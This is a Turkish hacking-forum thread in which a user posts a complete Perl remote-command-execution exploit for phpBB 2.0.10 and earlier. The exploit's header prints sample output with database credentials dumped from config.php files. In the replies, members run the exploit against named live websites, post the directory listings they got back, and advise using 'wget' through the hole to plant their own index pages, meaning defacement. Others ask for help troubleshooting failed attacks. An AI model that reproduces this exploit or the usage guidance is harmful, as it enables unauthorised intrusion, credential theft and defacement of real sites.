Slaughter
New member
http://rapidshare.de/files/10271300/rusherr.rar.html
kendm hazirladim umarim isinize yarr kolay gelsn..
kendm hazirladim umarim isinize yarr kolay gelsn..
phpbb 2.0.10 hack videosu...
- Konbuyu başlatan Slaughter
- Başlangıç tarihi
Slaughter
New member
buda exploit...,
Kod:
#!/usr/bin/perl
use IO::Socket;
## @@@@@@@ @@@ @@@ @@@@@@ @@@ @@@
## @@! @@@ @@! @@@ !@@ @@! @@@
## @!@!!@! @!@ !@! !@@!! @!@!@!@!
## !!: :!! !!: !!! !:! !!: !!!
## : : : :.:: : ::.: : : : :
##
## phpBB <= 2.0.10 remote commands exec exploit
## based on http://securityfocus.com/archive/1/380993/2004-11-07/2004-11-13/0
## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example...
## he-he-he ... read http://www.phpbb.com/phpBB/viewtopic.php?t=239819
## The third issue, search highlighting, has been checked by us several times and we can do
## nothing with it at all. Again, that particular group admit likewise. In a future release
## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our
## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to
## be cause for an immediate release.
## heh...
##
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "ls -la"
## *** CMD: [ ls -la ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## total 507
## drwxr-xr-x 12 dhn phpbb 896 Oct 13 18:23 .
## drwxrwxr-x 19 root phpbb 1112 Nov 12 15:08 ..
## drwxr-xr-x 2 dhn phpbb 152 Oct 13 18:23 CVS
## drwxr-xr-x 3 dhn phpbb 944 Jul 19 15:17 admin
## drwxrwxrwx 5 dhn phpbb 160 Aug 14 21:19 cache
## -rw-r--r-- 1 dhn phpbb 44413 Mar 11 2004 catdb.php
## -rw-r--r-- 1 dhn phpbb 5798 Jul 19 15:17 common.php
## -rw-r--r-- 1 root root 264 Jul 2 08:05 config.php
## drwxr-xr-x 3 dhn phpbb 136 Jun 24 06:40 db
## drwxr-xr-x 3 dhn phpbb 320 Jul 19 15:17 docs
## -rw-r--r-- 1 dhn phpbb 814 Oct 30 2003 extension.inc
## -rw-r--r-- 1 dhn phpbb 3646 Jul 10 04:21 faq.php
## drwxr-xr-x 2 dhn phpbb 96 Aug 12 14:59 files
## -rw-r--r-- 1 dhn phpbb 45642 Jul 12 12:42 groupcp.php
## drwxr-xr-x 7 dhn phpbb 240 Aug 12 16:22 images
## drwxr-xr-x 3 dhn phpbb 1048 Jul 19 15:17 includes
## -rw-r--r-- 1 dhn phpbb 14518 Jul 10 04:21 index.php
## drwxr-xr-x 60 dhn phpbb 2008 Sep 27 01:54 language
## -rw-r--r-- 1 dhn phpbb 7481 Jul 19 15:17 login.php
## -rw-r--r-- 1 dhn phpbb 12321 Mar 4 2004 memberlist.php
## -rw-r--r-- 1 dhn phpbb 37639 Jul 10 04:21 modcp.php
## -rw-r--r-- 1 dhn phpbb 45945 Mar 24 2004 mods_manager.php
## -rw-r--r-- 1 dhn phpbb 34447 Jul 10 04:21 posting.php
## -rw-r--r-- 1 dhn phpbb 72580 Jul 10 04:21 privmsg.php
## -rw-r--r-- 1 dhn phpbb 4190 Jul 12 12:42 profile.php
## -rw-r--r-- 1 dhn phpbb 16276 Oct 13 18:23 rules.php
## -rw-r--r-- 1 dhn phpbb 42694 Jul 19 15:17 search.php
## drwxr-xr-x 4 dhn phpbb 136 Jun 24 06:41 templates
## -rw-r--r-- 1 dhn phpbb 23151 Mar 13 2004 viewforum.php
## -rw-r--r-- 1 dhn phpbb 7237 Jul 10 04:21 viewonline.php
## -rw-r--r-- 1 dhn phpbb 45151 Jul 10 04:21 viewtopic.php
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "cat config.php"
## *** CMD: [ cat config.php ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## $dbms = "mysql";
## $dbhost = "localhost";
## $dbname = "phpbb";
## $dbuser = "phpbb";
## $dbpasswd = "phpBB_R0cKs";
## $table_prefix = "phpbb_";
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## rocksss....
##
## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## fucking lamaz...
##
## ccteam.ru
## $dbname = "ccteam_phpbb2";
## $dbuser = "ccteam_userphpbb";
## $dbpasswd = "XCbRsoy1";
##
## eat this dude...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if (@ARGV < 4)
{
print q(############################################################
phpBB <=2.0.10 remote command execution exploit
by RusH security team // www.rst.void.ru
############################################################
usage:
r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
params:
[URL] - server url e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la"
############################################################
);
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$topic = $ARGV[2];
$cmd = $ARGV[3];
$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$path = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
$on = 0;
while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}
print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
### EOF ###
# milw0rm.com [2004-11-22]taner_erkan
New member
- Katılım
- 15 Ocak 2006
- Mesajlar
- 6
- Reaction score
- 0
- Puanları
- 0
paylasımın için saol
burakteksavasır
New member
- Katılım
- 11 Mar 2006
- Mesajlar
- 32
- Reaction score
- 0
- Puanları
- 0
kardes bu program nasıl pişi yaff biras acıklasana indirdim aama ne işe yarıyo mesela
onay
New member
- Katılım
- 23 Eyl 2005
- Mesajlar
- 99
- Reaction score
- 0
- Puanları
- 0
benim denemelerimde hep bu hatayla karşılaşiyorum sorun ne olabilir
C:\Documents and Settings>cd..
C:\>cd perl
C:\Perl>cd bin
C:\Perl\bin>perl php lfa2004.altervista.org /forum/3 "ls -la"
Can't open perl script "php": No such file or directory
C:\Perl\bin>perl php lfa2004.altervista.org /forum/ 3 "ls -la"
Can't open perl script "php": No such file or directory
C:\Perl\bin>perl php www.npgsupport.com /nragroup/ 3 "ls -la"
Can't open perl script "php": No such file or directory
C:\Perl\bin>perl php www.npgsupport.com /nragroup/ 3 "ls -la"
Can't open perl script "php": No such file or directory
C:\Perl\bin>perl php www.npgsupport.com /nragroup/ 3 "ls -la"
Can't open perl script "php": No such file or directory
pl uzantisini yazmayi unutmuşum
herşey aynen tamam ama index atamadim biturlu neden olabilir...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
C:\Perl\bin>perl php.pl www.bondibeachonline.com /forum/ 3 "ls -la"
*** CMD: [ ls -la ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
total 432
drwxr-xr-x 10 bondibeachonline site181 4096 Jul 21 2005 .
drwxr-xr-x 40 bondibeachonline site181 12288 Sep 20 17:13 ..
drwxr-xr-x 2 bondibeachonline site181 4096 Nov 10 2004 admin
drwxr-xr-x 2 bondibeachonline site181 4096 Nov 10 2004 cache
-rw-r--r-- 1 bondibeachonline site181 5796 Nov 10 2004 common.php
-rw-r--r-- 1 bondibeachonline site181 279 Nov 10 2004 config.php
drwxr-xr-x 2 bondibeachonline site181 4096 Nov 10 2004 db
drwxr-xr-x 2 bondibeachonline site181 4096 Nov 10 2004 docs
-rw-r--r-- 1 bondibeachonline site181 810 Nov 10 2004 extension.inc
-rw-r--r-- 1 bondibeachonline site181 3643 Nov 10 2004 faq.php
-rw-r--r-- 1 bondibeachonline site181 45641 Nov 10 2004 groupcp.php
drwxr-xr-x 4 bondibeachonline site181 4096 Nov 10 2004 images
drwxr-xr-x 2 bondibeachonline site181 4096 Nov 10 2004 includes
-rw-r--r-- 1 bondibeachonline site181 14515 Nov 10 2004 index.php
drwxr-xr-x 3 bondibeachonline site181 4096 Nov 10 2004 language
-rw-r--r-- 1 bondibeachonline site181 7479 Nov 10 2004 login.php
-rw-r--r-- 1 bondibeachonline site181 12150 Nov 10 2004 memberlist.php
-rw-r--r-- 1 bondibeachonline site181 37639 Nov 10 2004 modcp.php
-rw-r--r-- 1 bondibeachonline site181 34446 Nov 10 2004 posting.php
-rw-r--r-- 1 bondibeachonline site181 72578 Nov 10 2004 privmsg.php
-rw-r--r-- 1 bondibeachonline site181 3753 Nov 10 2004 profile.php
-rw-r--r-- 1 bondibeachonline site181 42692 Nov 10 2004 search.php
drwxr-xr-x 3 bondibeachonline site181 4096 Nov 10 2004 templates
-rw-r--r-- 1 bondibeachonline site181 23154 Nov 10 2004 viewforum.php
-rw-r--r-- 1 bondibeachonline site181 7234 Nov 10 2004 viewonline.php
-rw-r--r-- 1 bondibeachonline site181 45150 Nov 10 2004 viewtopic.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
C:\Documents and Settings>cd..
C:\>cd perl
C:\Perl>cd bin
C:\Perl\bin>perl php lfa2004.altervista.org /forum/3 "ls -la"
Can't open perl script "php": No such file or directory
C:\Perl\bin>perl php lfa2004.altervista.org /forum/ 3 "ls -la"
Can't open perl script "php": No such file or directory
C:\Perl\bin>perl php www.npgsupport.com /nragroup/ 3 "ls -la"
Can't open perl script "php": No such file or directory
C:\Perl\bin>perl php www.npgsupport.com /nragroup/ 3 "ls -la"
Can't open perl script "php": No such file or directory
C:\Perl\bin>perl php www.npgsupport.com /nragroup/ 3 "ls -la"
Can't open perl script "php": No such file or directory
pl uzantisini yazmayi unutmuşum
herşey aynen tamam ama index atamadim biturlu neden olabilir...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
C:\Perl\bin>perl php.pl www.bondibeachonline.com /forum/ 3 "ls -la"
*** CMD: [ ls -la ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
total 432
drwxr-xr-x 10 bondibeachonline site181 4096 Jul 21 2005 .
drwxr-xr-x 40 bondibeachonline site181 12288 Sep 20 17:13 ..
drwxr-xr-x 2 bondibeachonline site181 4096 Nov 10 2004 admin
drwxr-xr-x 2 bondibeachonline site181 4096 Nov 10 2004 cache
-rw-r--r-- 1 bondibeachonline site181 5796 Nov 10 2004 common.php
-rw-r--r-- 1 bondibeachonline site181 279 Nov 10 2004 config.php
drwxr-xr-x 2 bondibeachonline site181 4096 Nov 10 2004 db
drwxr-xr-x 2 bondibeachonline site181 4096 Nov 10 2004 docs
-rw-r--r-- 1 bondibeachonline site181 810 Nov 10 2004 extension.inc
-rw-r--r-- 1 bondibeachonline site181 3643 Nov 10 2004 faq.php
-rw-r--r-- 1 bondibeachonline site181 45641 Nov 10 2004 groupcp.php
drwxr-xr-x 4 bondibeachonline site181 4096 Nov 10 2004 images
drwxr-xr-x 2 bondibeachonline site181 4096 Nov 10 2004 includes
-rw-r--r-- 1 bondibeachonline site181 14515 Nov 10 2004 index.php
drwxr-xr-x 3 bondibeachonline site181 4096 Nov 10 2004 language
-rw-r--r-- 1 bondibeachonline site181 7479 Nov 10 2004 login.php
-rw-r--r-- 1 bondibeachonline site181 12150 Nov 10 2004 memberlist.php
-rw-r--r-- 1 bondibeachonline site181 37639 Nov 10 2004 modcp.php
-rw-r--r-- 1 bondibeachonline site181 34446 Nov 10 2004 posting.php
-rw-r--r-- 1 bondibeachonline site181 72578 Nov 10 2004 privmsg.php
-rw-r--r-- 1 bondibeachonline site181 3753 Nov 10 2004 profile.php
-rw-r--r-- 1 bondibeachonline site181 42692 Nov 10 2004 search.php
drwxr-xr-x 3 bondibeachonline site181 4096 Nov 10 2004 templates
-rw-r--r-- 1 bondibeachonline site181 23154 Nov 10 2004 viewforum.php
-rw-r--r-- 1 bondibeachonline site181 7234 Nov 10 2004 viewonline.php
-rw-r--r-- 1 bondibeachonline site181 45150 Nov 10 2004 viewtopic.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Arkadaşım dosyalar gözüktükten sonra "wget" komutunu kullanman lazım.Example:
C:\Perl\bin>perl php.pl www.bondibeachonline.com /forum/ 3 "wget www.canberx.com"
www.canberx.com yerine kendi indexinin olduğu siteyi yaz...
C:\Perl\bin>perl php.pl www.bondibeachonline.com /forum/ 3 "wget www.canberx.com"
www.canberx.com yerine kendi indexinin olduğu siteyi yaz...
seyhsade
New member
ya dostum bu topic numarasını nasıl bulcaz direk 3 yazsak olurmu 3 yazıyorum exploit failed diyo her seyi yapıyom ama bi bu sorun var ya acık kapanmıs yada bu topic numarasından farzetki acık kapanmıs peki topic numarasını nasıl anlıcam
alone_fisher
New member
- Katılım
- 9 Eki 2005
- Mesajlar
- 3
- Reaction score
- 0
- Puanları
- 0
TŞk
Harbİden GÜzel DÖkÜman TeŞekkÜrler GÜzel AÇik YakalamiŞsin
Harbİden GÜzel DÖkÜman TeŞekkÜrler GÜzel AÇik YakalamiŞsin
brader
New member
- Katılım
- 18 Eyl 2005
- Mesajlar
- 87
- Reaction score
- 0
- Puanları
- 0
seyhsade' Alıntı:ya dostum bu topic numarasını nasıl bulcaz direk 3 yazsak olurmu 3 yazıyorum exploit failed diyo her seyi yapıyom ama bi bu sorun var ya acık kapanmıs yada bu topic numarasından farzetki acık kapanmıs peki topic numarasını nasıl anlıcam
Bende anlamadim orayi dostum, ayni hatta cikiyor
Birisi bir açiklama yapsa çok süper olacak
JustIcE
New member
- Katılım
- 2 Nis 2006
- Mesajlar
- 24
- Reaction score
- 0
- Puanları
- 0
ScreenShot da gosterdim..
Activeperl u c:/ ye at sora exploit i c:/perl/bin dosyasina at sora sirala alttaki komutlari Baslat>Calistir>Cmd ye yaz...
Kod:
cd..
cd..
cd perl
cd bin
perl bb.plperl bb.pl den sora kullanim cikar....
gayet kolay
Kolay gelsn
brader
New member
- Katılım
- 18 Eyl 2005
- Mesajlar
- 87
- Reaction score
- 0
- Puanları
- 0
Evet Dostum, bende aynen onu yapiyorum ama sorun :
C:\Perl\bin>bb.pl www.********.com / 2179 "ls -la"
*** CMD: [ ls -la ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[-] EXPLOIT FAILED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
C:\Perl\bin>
Belki 2.0.10 ama exploit olmuyor
C:\Perl\bin>bb.pl www.********.com / 2179 "ls -la"
*** CMD: [ ls -la ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[-] EXPLOIT FAILED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
C:\Perl\bin>
Belki 2.0.10 ama exploit olmuyor
surferumac
New member
- Katılım
- 24 Ocak 2006
- Mesajlar
- 32
- Reaction score
- 0
- Puanları
- 0
arkadaşlar c:/perl/bin/perl bb.pl ve ya php.pl yazdıım da tabi dewamını da yazıorum ama cant open perl script diyor ne yapmalıyım